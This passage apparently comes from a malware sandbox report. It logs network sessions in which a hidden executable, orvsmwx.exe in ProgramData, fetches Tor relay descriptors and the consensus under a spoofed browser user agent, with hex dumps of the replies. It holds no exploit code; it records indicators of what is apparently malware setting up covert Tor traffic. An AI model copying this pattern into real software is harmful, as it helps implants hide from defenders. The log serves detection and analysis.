72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 32 2d 31 32 2d 31 31 20 30 31 3a 31 34 3a 34 37 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 34 35 42 43 20 39 39 31 37 20 46 37 45 31 20 33 37 37 30 20 37 33 36 42 20 42 46 46 43 20 32 32 45 36 20 46 31 37 30 20 45 31 34 45 20 31 36 45 43 0a 75 70 74 69 6d 65 20 31 32 39 37 39 34 0a 62 61 6e 64 77 69 64 74 68 20 32 30 34 38 30 30 30 20 34 30 39 36 30 30 30 20 32 33 35 34 36 36 32 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 44 35 35 35 45 35 42 33 38 32 30 38 46 33 42 35 34 43 39 34 36 36 33 42 44 41 34 42 42 41 39 45 41 34 36 38 38 39 35 33 20 46 6b 7a 77 47 61 56 66 32 64 33 57 75 4a 35 31 35 38 67 47 47 5a 38 49 46 6e 37 38 30 6c 70 48 34 55 42 48 47 51 52 6c 79 4b 6f 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4c 59 39 51 49 68 2f 79 69 58 64 4a 51 31 79 51 58 64 6a 53 6f 6e 68 54 6b 6a 41 67 58 4d 34 58 7a 6e 38 75 78 77 79 44 73 4e 7a 65 57 6a 31 54 5a 45 54 36 5a 57 5a 0a 6c 32 47 52 4b 41 4e 46 77 46 53 56 52 49 63 6d 69 34 33 75 75 63 54 69 43 7a 48 31 65 72 53 72 57 30 6b 52 4a 62 65 62 4a 65 4a 68 43 35 77 69 74 51 52 76 4a 49 63 6b 75 79 49 4f 74 37 30 64 0a 43 68 76 31 36 6b 77 55 4a 4d 69 63 7a 79 44 70 59 2f 77 37 5a 6c 32 76 43 6c 6a 59 69 6e 79 33 73 4b 57 42 70 58 41 35 5a 41 61 2b 79 4e 75 70 67 42 6e 35 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4c 42 46 39 45 44 68 4c 53
                          Data Ascii: router GalaxyNewsRadio 84.62.245.6 9001 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxUxAVbs1PI0VDEFUz55fRfxh+7MGNrA5t5aN3IesGfsUqxQAQAgBABBQHKwM8IGgQ9dK2R4NMgzsLz/onx3FQItuxRviMt6HWhSKcoj6ewElNnaP4YoESMzdmvsKUrrzYeLejw33pUH8qKCproA73Xm+dRyD8S2r6+FSrkvCwUuxtAkPA51bQU=-----END ED25519 CERT-----master-key-ed25519 QUBysDPCBoEPXStkeDTIM7C8/6J8dxUCLbsUb4jLeh0platform Tor 0.4.7.10 on OpenBSDproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2022-12-11 01:14:47fingerprint 45BC 9917 F7E1 3770 736B BFFC 22E6 F170 E14E 16ECuptime 129794bandwidth 2048000 4096000 2354662extra-info-digest D555E5B38208F3B54C94663BDA4BBA9EA4688953 FkzwGaVf2d3WuJ5158gGGZ8IFn780lpH4UBHGQRlyKoonion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBALY9QIh/yiXdJQ1yQXdjSonhTkjAgXM4Xzn8uxwyDsNzeWj1TZET6ZWZl2GRKANFwFSVRIcmi43uucTiCzH1erSrW0kRJbebJeJhC5witQRvJIckuyIOt70dChv16kwUJMiczyDpY/w7Zl2vCljYiny3sKWBpXA5ZAa+yNupgBn5AgMBAAE=-----END RSA PUBLIC KEY-----signing-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBALBF9EDhLS


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          46192.168.2.34975184.144.111.469031C:\ProgramData\prfxiau\orvsmwx.exe
                          TimestampkBytes transferredDirectionData
                          Dec 11, 2022 09:26:44.615205050 CET7884OUTGET /tor/server/fp/02b2152129686ae0be05f3d1460591dd71c4bb15 HTTP/1.0
                          Host: 84.144.111.46
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          Connection: close
                          Dec 11, 2022 09:26:44.659997940 CET7886INHTTP/1.0 200 OK
                          Date: Sun, 11 Dec 2022 08:26:30 GMT
                          Content-Type: text/plain
                          X-Your-Address-Is: 84.17.52.51
                          Content-Encoding: identity
                          Expires: Tue, 13 Dec 2022 08:26:30 GMT
                          Data Raw: 72 6f 75 74 65 72 20 30 78 36 37 37 32 36 35 37 39 20 38 39 2e 35 38 2e 36 30 2e 32 30 38 20 39 30 30 31 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 61 45 41 62 44 46 54 42 6c 38 6a 66 42 77 56 44 37 65 38 74 51 4e 6c 4a 68 56 53 48 44 51 43 43 75 71 79 78 31 2f 7a 66 4b 55 6b 6c 67 59 41 51 41 67 42 41 44 57 4c 54 30 59 0a 50 46 35 65 64 59 36 53 76 55 62 69 71 70 47 4a 75 67 55 6e 4e 71 68 48 32 73 69 2b 31 2f 67 46 61 57 58 66 30 4a 66 59 42 6d 4b 42 49 52 57 70 78 4b 62 44 4e 42 44 39 58 39 5a 6d 61 62 43 6f 0a 76 61 49 77 50 71 6a 39 57 56 35 57 2f 4d 66 43 77 34 71 6d 70 64 58 72 5a 75 77 5a 46 34 4d 48 53 6e 78 68 6e 4e 57 6d 57 46 6a 31 2f 4c 30 68 48 74 6e 7a 52 6b 63 67 46 77 73 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 31 69 30 39 47 44 78 65 58 6e 57 4f 6b 72 31 47 34 71 71 52 69 62 6f 46 4a 7a 61 6f 52 39 72 49 76 74 66 34 42 57 6c 6c 33 39 41 0a 6f 72 2d 61 64 64 72 65 73 73 20 5b 32 61 30 61 3a 34 63 63 30 3a 31 3a 32 65 38 3a 34 33 30 3a 64 30 66 66 3a 66 65 31 36 3a 61 66 34 66 5d 3a 39 30 30 31 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 31 31 20 6f 6e 20 4c 69 6e 75 78 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 32 2d 31 32 2d 31 31 20 30 32 3a 31 30 3a 31 39 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 30 32 42 32 20 31 35 32 31 20 32 39 36 38 20 36 41 45 30 20 42 45 30 35 20 46 33 44 31 20 34 36 30 35 20 39 31 44 44 20 37 31 43 34 20 42 42 31 35 0a 75 70 74 69 6d 65 20 36 34 38 32 30 37 0a 62 61 6e 64 77 69 64 74 68 20 31 32 35 38 32 39 31 32 20 31 36 37 37 37 32 31 36 20 31 32 36 33 32 39 32 32 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 46 44 41 44 39 38 34 31 36 46 42 36 38 37 37 34 45 30 30 35 39 44 42 39 32 42 35 35 43 41 37 43 34 42 41 36 45 42 42 37 20 67 42 76 58 68 30 4f 62 74 6b 41 33 6a 6b 6e 4b 49 7a 59 46 6a 5a 4e 4b 46 67 65 62 56 4b 49 63 4a 75 76 38 4a 70 32 50 7a 6e 73 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4f 44 4f 36 47 34 39 33 44 44 6a 2f 36 4a 6d 52 76 33 6b 38 2f 61 51 68 57 42 72 72 73 6d 51 4c 51 64 52 56 67 35 73 33 44 6a 61 6d 55 51 41 4d 4f 64 48 41 61 63 41 0a 55 73 63 57 46 4a 56 47 2f 4c 69 61 4b 57 66 45 65 42 59 6b 42 65 54 35 45 49 70 76 50 49 32 31 55 2f 4d 42 55 53 45 4c 57 74 51 68 6a 57 56 6b 45 73 71 4a 5a 32 52 48 63 77 50 44 51 76 6e 76 0a 6e 4b 37 46 31 7a 43 61 6c 38 75 64 4b 50 6e 34 39 61 56 61 33 72 56 43 30 4c 50 32 4d 53 57 46 66 66 74 63 2f 53 71 42 35 54 36 64 7a 4d 73 41 51 6a 38 4a 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79
                          Data Ascii: router 0x67726579 89.58.60.208 9001 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxaEAbDFTBl8jfBwVD7e8tQNlJhVSHDQCCuqyx1/zfKUklgYAQAgBADWLT0YPF5edY6SvUbiqpGJugUnNqhH2si+1/gFaWXf0JfYBmKBIRWpxKbDNBD9X9ZmabCovaIwPqj9WV5W/MfCw4qmpdXrZuwZF4MHSnxhnNWmWFj1/L0hHtnzRkcgFws=-----END ED25519 CERT-----master-key-ed25519 1i09GDxeXnWOkr1G4qqRiboFJzaoR9rIvtf4BWll39Aor-address [2a0a:4cc0:1:2e8:430:d0ff:fe16:af4f]:9001platform Tor 0.4.7.11 on Linuxproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2022-12-11 02:10:19fingerprint 02B2 1521 2968 6AE0 BE05 F3D1 4605 91DD 71C4 BB15uptime 648207bandwidth 12582912 16777216 12632922extra-info-digest FDAD98416FB68774E0059DB92B55CA7C4BA6EBB7 gBvXh0ObtkA3jknKIzYFjZNKFgebVKIcJuv8Jp2Pznsonion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAODO6G493DDj/6JmRv3k8/aQhWBrrsmQLQdRVg5s3DjamUQAMOdHAacAUscWFJVG/LiaKWfEeBYkBeT5EIpvPI21U/MBUSELWtQhjWVkEsqJZ2RHcwPDQvnvnK7F1zCal8udKPn49aVa3rVC0LP2MSWFfftc/SqB5T6dzMsAQj8JAgMBAAE=-----END RSA PUBLIC KEY-----signing-key


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          47192.168.2.34975284.144.111.469031C:\ProgramData\prfxiau\orvsmwx.exe
                          TimestampkBytes transferredDirectionData
                          Dec 11, 2022 09:26:45.166342020 CET7892OUTGET /tor/server/fp/45bc9917f7e13770736bbffc22e6f170e14e16ec HTTP/1.0
                          Host: 84.144.111.46
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          Connection: close
                          Dec 11, 2022 09:26:45.214689016 CET7894INHTTP/1.0 200 OK
                          Date: Sun, 11 Dec 2022 08:26:30 GMT
                          Content-Type: text/plain
                          X-Your-Address-Is: 84.17.52.51
                          Content-Encoding: identity
                          Expires: Tue, 13 Dec 2022 08:26:30 GMT
                          Data Raw: 72 6f 75 74 65 72 20 47 61 6c 61 78 79 4e 65 77 73 52 61 64 69 6f 20 38 34 2e 36 32 2e 32 34 35 2e 36 20 39 30 30 31 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 55 78 41 56 62 73 31 50 49 30 56 44 45 46 55 7a 35 35 66 52 66 78 68 2b 37 4d 47 4e 72 41 35 74 35 61 4e 33 49 65 73 47 66 73 55 71 78 51 41 51 41 67 42 41 42 42 51 48 4b 77 0a 4d 38 49 47 67 51 39 64 4b 32 52 34 4e 4d 67 7a 73 4c 7a 2f 6f 6e 78 33 46 51 49 74 75 78 52 76 69 4d 74 36 48 57 68 53 4b 63 6f 6a 36 65 77 45 6c 4e 6e 61 50 34 59 6f 45 53 4d 7a 64 6d 76 73 0a 4b 55 72 72 7a 59 65 4c 65 6a 77 33 33 70 55 48 38 71 4b 43 70 72 6f 41 37 33 58 6d 2b 64 52 79 44 38 53 32 72 36 2b 46 53 72 6b 76 43 77 55 75 78 74 41 6b 50 41 35 31 62 51 55 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 51 55 42 79 73 44 50 43 42 6f 45 50 58 53 74 6b 65 44 54 49 4d 37 43 38 2f 36 4a 38 64 78 55 43 4c 62 73 55 62 34 6a 4c 65 68 30 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 31 30 20 6f 6e 20 4f 70 65 6e 42 53 44 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 32 2d 31 32 2d 31 31 20 30 31 3a 31 34 3a 34 37 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 34 35 42 43 20 39 39 31 37 20 46 37 45 31 20 33 37 37 30 20 37 33 36 42 20 42 46 46 43 20 32 32 45 36 20 46 31 37 30 20 45 31 34 45 20 31 36 45 43 0a 75 70 74 69 6d 65 20 31 32 39 37 39 34 0a 62 61 6e 64 77 69 64 74 68 20 32 30 34 38 30 30 30 20 34 30 39 36 30 30 30 20 32 33 35 34 36 36 32 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 44 35 35 35 45 35 42 33 38 32 30 38 46 33 42 35 34 43 39 34 36 36 33 42 44 41 34 42 42 41 39 45 41 34 36 38 38 39 35 33 20 46 6b 7a 77 47 61 56 66 32 64 33 57 75 4a 35 31 35 38 67 47 47 5a 38 49 46 6e 37 38 30 6c 70 48 34 55 42 48 47 51 52 6c 79 4b 6f 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4c 59 39 51 49 68 2f 79 69 58 64 4a 51 31 79 51 58 64 6a 53 6f 6e 68 54 6b 6a 41 67 58 4d 34 58 7a 6e 38 75 78 77 79 44 73 4e 7a 65 57 6a 31 54 5a 45 54 36 5a 57 5a 0a 6c 32 47 52 4b 41 4e 46 77 46 53 56 52 49 63 6d 69 34 33 75 75 63 54 69 43 7a 48 31 65 72 53 72 57 30 6b 52 4a 62 65 62 4a 65 4a 68 43 35 77 69 74 51 52 76 4a 49 63 6b 75 79 49 4f 74 37 30 64 0a 43 68 76 31 36 6b 77 55 4a 4d 69 63 7a 79 44 70 59 2f 77 37 5a 6c 32 76 43 6c 6a 59 69 6e 79 33 73 4b 57 42 70 58 41 35 5a 41 61 2b 79 4e 75 70 67 42 6e 35 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4c 42 46 39 45 44 68 4c 53
                          Data Ascii: router GalaxyNewsRadio 84.62.245.6 9001 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxUxAVbs1PI0VDEFUz55fRfxh+7MGNrA5t5aN3IesGfsUqxQAQAgBABBQHKwM8IGgQ9dK2R4NMgzsLz/onx3FQItuxRviMt6HWhSKcoj6ewElNnaP4YoESMzdmvsKUrrzYeLejw33pUH8qKCproA73Xm+dRyD8S2r6+FSrkvCwUuxtAkPA51bQU=-----END ED25519 CERT-----master-key-ed25519 QUBysDPCBoEPXStkeDTIM7C8/6J8dxUCLbsUb4jLeh0platform Tor 0.4.7.10 on OpenBSDproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2022-12-11 01:14:47fingerprint 45BC 9917 F7E1 3770 736B BFFC 22E6 F170 E14E 16ECuptime 129794bandwidth 2048000 4096000 2354662extra-info-digest D555E5B38208F3B54C94663BDA4BBA9EA4688953 FkzwGaVf2d3WuJ5158gGGZ8IFn780lpH4UBHGQRlyKoonion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBALY9QIh/yiXdJQ1yQXdjSonhTkjAgXM4Xzn8uxwyDsNzeWj1TZET6ZWZl2GRKANFwFSVRIcmi43uucTiCzH1erSrW0kRJbebJeJhC5witQRvJIckuyIOt70dChv16kwUJMiczyDpY/w7Zl2vCljYiny3sKWBpXA5ZAa+yNupgBn5AgMBAAE=-----END RSA PUBLIC KEY-----signing-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBALBF9EDhLS


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          48192.168.2.34975384.144.111.469031C:\ProgramData\prfxiau\orvsmwx.exe
                          TimestampkBytes transferredDirectionData
                          Dec 11, 2022 09:26:45.339710951 CET7897OUTGET /tor/server/fp/02d832f002d4ca3d25adda2cbbb2d09ee41a15ab HTTP/1.0
                          Host: 84.144.111.46
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          Connection: close
                          Dec 11, 2022 09:26:45.385582924 CET7898INHTTP/1.0 200 OK
                          Date: Sun, 11 Dec 2022 08:26:31 GMT
                          Content-Type: text/plain
                          X-Your-Address-Is: 84.17.52.51
                          Content-Encoding: identity
                          Expires: Tue, 13 Dec 2022 08:26:31 GMT
                          Data Raw: 72 6f 75 74 65 72 20 38 34 31 32 30 33 34 31 30 33 37 38 30 32 33 37 20 32 30 39 2e 31 34 31 2e 33 37 2e 39 34 20 39 30 30 31 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 61 4c 41 65 53 79 6a 35 7a 47 4c 76 6e 7a 72 59 69 6c 67 6a 71 75 50 48 52 4b 5a 37 63 6d 34 63 57 6d 39 71 35 52 53 4e 73 63 4d 65 44 65 41 51 41 67 42 41 42 64 4b 72 4e 74 0a 4d 69 34 61 42 4f 6d 70 31 74 6e 79 48 4b 68 62 53 59 63 37 55 7a 4b 37 6a 51 4d 4b 59 7a 37 6c 70 4e 52 4a 4b 36 38 62 48 34 35 4c 50 41 37 33 74 34 65 4c 47 67 4b 31 6d 6f 66 4b 77 75 30 48 0a 38 71 30 2f 38 4d 43 4e 68 2f 78 75 5a 4f 2f 4d 71 4c 74 74 57 62 49 32 42 61 61 64 59 30 45 35 35 6b 43 46 74 4f 6d 51 59 45 79 64 4f 46 76 62 47 41 65 33 6f 4b 61 33 56 41 34 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 58 53 71 7a 62 54 49 75 47 67 54 70 71 64 62 5a 38 68 79 6f 57 30 6d 48 4f 31 4d 79 75 34 30 44 43 6d 4d 2b 35 61 54 55 53 53 73 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 31 30 20 6f 6e 20 4c 69 6e 75 78 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 32 2d 31 32 2d 31 31 20 30 34 3a 30 33 3a 34 37 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 30 32 44 38 20 33 32 46 30 20 30 32 44 34 20 43 41 33 44 20 32 35 41 44 20 44 41 32 43 20 42 42 42 32 20 44 30 39 45 20 45 34 31 41 20 31 35 41 42 0a 75 70 74 69 6d 65 20 33 39 33 38 35 39 38 0a 62 61 6e 64 77 69 64 74 68 20 33 30 37 32 30 30 30 20 31 30 37 33 37 34 31 38 32 34 20 37 36 32 35 35 37 39 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 46 35 31 41 46 42 32 34 46 44 45 32 35 33 43 30 46 30 42 45 46 32 37 42 41 45 38 33 46 42 45 30 38 46 33 36 42 43 38 39 20 33 68 6d 57 74 54 44 36 43 68 49 41 47 6d 73 4f 4a 43 48 37 7a 6a 4f 62 33 77 58 47 4a 42 2b 57 59 56 4f 48 6c 6a 55 7a 33 35 51 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4b 32 4a 31 34 33 34 4f 4e 63 41 49 37 70 75 37 33 51 35 41 38 56 64 42 4f 69 61 63 35 33 59 74 46 62 31 78 44 64 43 6a 31 57 4d 4d 65 52 46 76 4d 51 44 4a 45 58 36 0a 38 71 72 48 50 6f 45 31 63 4e 4e 32 59 6e 44 6f 74 4f 7a 76 4e 62 64 4a 36 79 69 32 62 6a 5a 61 41 62 31 6d 64 49 52 43 6c 56 6f 4b 38 49 41 31 5a 30 41 79 58 72 51 76 53 57 61 37 6d 7a 31 36 0a 47 2f 32 6e 39 6f 71 44 47 79 39 77 67 78 2b 57 6b 45 42 41 46 6e 33 37 39 70 55 34 78 78 57 41 42 34 4b 6d 4f 46 31 2f 49 67 2f 34 75 73 43 63 43 57 55 64 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4e 39 55 41
                          Data Ascii: router 8412034103780237 209.141.37.94 9001 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxaLAeSyj5zGLvnzrYilgjquPHRKZ7cm4cWm9q5RSNscMeDeAQAgBABdKrNtMi4aBOmp1tnyHKhbSYc7UzK7jQMKYz7lpNRJK68bH45LPA73t4eLGgK1mofKwu0H8q0/8MCNh/xuZO/MqLttWbI2BaadY0E55kCFtOmQYEydOFvbGAe3oKa3VA4=-----END ED25519 CERT-----master-key-ed25519 XSqzbTIuGgTpqdbZ8hyoW0mHO1Myu40DCmM+5aTUSSsplatform Tor 0.4.7.10 on Linuxproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2022-12-11 04:03:47fingerprint 02D8 32F0 02D4 CA3D 25AD DA2C BBB2 D09E E41A 15ABuptime 3938598bandwidth 3072000 1073741824 7625579extra-info-digest F51AFB24FDE253C0F0BEF27BAE83FBE08F36BC89 3hmWtTD6ChIAGmsOJCH7zjOb3wXGJB+WYVOHljUz35Qonion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAK2J1434ONcAI7pu73Q5A8VdBOiac53YtFb1xDdCj1WMMeRFvMQDJEX68qrHPoE1cNN2YnDotOzvNbdJ6yi2bjZaAb1mdIRClVoK8IA1Z0AyXrQvSWa7mz16G/2n9oqDGy9wgx+WkEBAFn379pU4xxWAB4KmOF1/Ig/4usCcCWUdAgMBAAE=-----END RSA PUBLIC KEY-----signing-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAN9UA


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          49192.168.2.34975886.59.21.3880C:\ProgramData\prfxiau\orvsmwx.exe
                          TimestampkBytes transferredDirectionData
                          Dec 11, 2022 09:26:57.544032097 CET7913OUTGET /tor/status-vote/current/consensus HTTP/1.0
                          Host: 86.59.21.38
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          Connection: close
                          Dec 11, 2022 09:26:57.794470072 CET7914OUTGET /tor/status-vote/current/consensus HTTP/1.0
                          Host: 86.59.21.38
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          Connection: close
                          Dec 11, 2022 09:26:58.107022047 CET7914OUTGET /tor/status-vote/current/consensus HTTP/1.0
                          Host: 86.59.21.38
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          Connection: close
                          Dec 11, 2022 09:26:58.716414928 CET7914OUTGET /tor/status-vote/current/consensus HTTP/1.0
                          Host: 86.59.21.38
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          Connection: close
                          Dec 11, 2022 09:26:59.919744968 CET7914OUTGET /tor/status-vote/current/consensus HTTP/1.0
                          Host: 86.59.21.38
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          Connection: close
                          Dec 11, 2022 09:27:01.122922897 CET7915OUTGET /tor/status-vote/current/consensus HTTP/1.0
                          Host: 86.59.21.38
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          Connection: close
                          Dec 11, 2022 09:27:02.326112986 CET7915OUTGET /tor/status-vote/current/consensus HTTP/1.0
                          Host: 86.59.21.38
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          Connection: close
                          Dec 11, 2022 09:27:04.732702971 CET7919OUTGET /tor/status-vote/current/consensus HTTP/1.0
                          Host: 86.59.21.38
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          Connection: close
                          Dec 11, 2022 09:27:07.636687994 CET7920INHTTP/1.0 200 OK
                          Date: Sun, 11 Dec 2022 08:26:57 GMT
                          Content-Type: text/plain
                          X-Your-Address-Is: 84.17.52.51
                          Content-Encoding: identity
                          Expires: Sun, 11 Dec 2022 09:00:00 GMT
                          Vary: X-Or-Diff-From-Consensus
